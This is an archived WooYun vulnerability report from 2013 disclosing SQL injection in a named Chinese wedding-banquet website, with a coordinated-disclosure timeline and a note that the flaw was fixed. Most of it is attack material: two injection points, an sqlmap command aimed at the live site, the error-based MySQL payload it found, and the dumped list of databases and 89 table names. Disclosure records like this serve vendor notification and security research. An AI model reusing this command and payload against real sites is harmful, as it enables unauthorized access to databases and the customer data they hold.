乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-24: 细节已通知厂商并且等待厂商处理中 2013-07-24: 厂商已经确认,细节仅向厂商公开 2013-08-03: 细节向核心白帽子及相关领域专家公开 2013-08-13: 细节向普通白帽子公开 2013-08-23: 细节向实习白帽子公开 2013-09-07: 细节向公众公开
天下喜宴网http://www.tianxiaxiyan.com
注入点1:http://www.tianxiaxiyan.com/index.php/feast/shop_list/money/%5C.html
注入点2:POST /index.php/feast/search.html HTTP/1.1Host: www.tianxiaxiyan.comkeywords=%c7%eb%ca%e4%c8%eb%be%c6%b5%ea%c3%fb%b3%c6...&page=%5c
。。。。
注入点:./sqlmap.py -u "http://www.tianxiaxiyan.com/index.php/feast/search.html" --data "keywords=1" --dbsPlace: POSTParameter: keywords Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keywords=1' AND (SELECT 2675 FROM(SELECT COUNT(*),CONCAT(0x3a6f656c3a,(SELECT (CASE WHEN (2675=2675) THEN 1 ELSE 0 END)),0x3a6b6f793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qooG'='qooG---[03:46:13] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.8back-end DBMS: MySQL 5.0available databases [19]:[*] ad_cheat[*] bj_marry[*] cpo[*] feast[*] gbb[*] iliba[*] import[*] information_schema[*] lucky[*] marry[*] marry8[*] marry_count[*] marry_nihao[*] marry_search[*] marry_xiyan[*] mysql[*] new_marry[*] shopping[*] testDatabase: marry[89 tables]+---------------------------------+| ALBUM_SORT_DES || ALBUM_SORT_NAME || AL_ALBUM || AL_ALBUM_DIR || AL_DOWNLOAD_WORD_COUNT || APPLY || APPLY_08new || BULLETIN || BULLETIN_SHOP || CHARGE_RETURN_MONEY || CHARGE_RETURN_PERCENT || FEAST_ALBUM || FEAST_ALBUM_DIR || FEAST_ALBUM_SORT || FEAST_APPLY || FEAST_SHOP || FEAST_SHOP_DISH_info || FEAST_SHOP_case || FEAST_SHOP_log || FEAST_SHOP_type || FEAST_TRANSFER || FILE_LINK || F_B || ORDER_CHECKOUT || ORDER_DATE || ORDER_INFO || ORDER_INFO_bak || ORDER_NOTE || SALES_PROMOTION || SHOP || SHOP_ALBUM || SHOP_ALBUM_DIR || SHOP_ALBUM_SORT || SHOP_BAK || SHOP_CASE || SHOP_CASE_DIR || SHOP_COLLECT || SHOP_DAY || SHOP_INFO || SHOP_MONEY || SHOP_MONTH || SHOP_ORDER_DAILY || SHOP_ORDER_DATE || SHOP_PAY || SHOP_QA || SHOP_RECOMMEND || SHOP_REQUIRE || SHOP_WEEK || SHOP_month_reckoning || SORT || activity_order || activity_order_id || beginwell_submit_order_ok || employee_activity || feast_bless || feast_group || feast_group_number || feast_hall_book || feast_hall_hotday || feast_hall_info || feast_order_autofax || feast_order_call_back_log || feast_order_change_log || feast_order_date || feast_order_info || feast_shop_qa || feast_update_cent_log || hotdeal2006_count || hotdeal2006_submit_order_cancel || hotdeal2006_submit_order_ok || hotdeal2006_submit_order_ok_bak || import_activity_order || marry_shoot_article || page_view || party_070616 || party_info || shop_edit || shop_editable_field || shop_manager_refer || tmp_class_cust_marry || vote_info || vote_liba_bride || vote_liba_bride_member || vote_option_info || vote_user_info || wedding_sign || work_record || work_record_omit || z_signup_user |+---------------------------------+
危害等级:中
漏洞Rank:8
确认时间:2013-07-24 17:31
已修复
暂无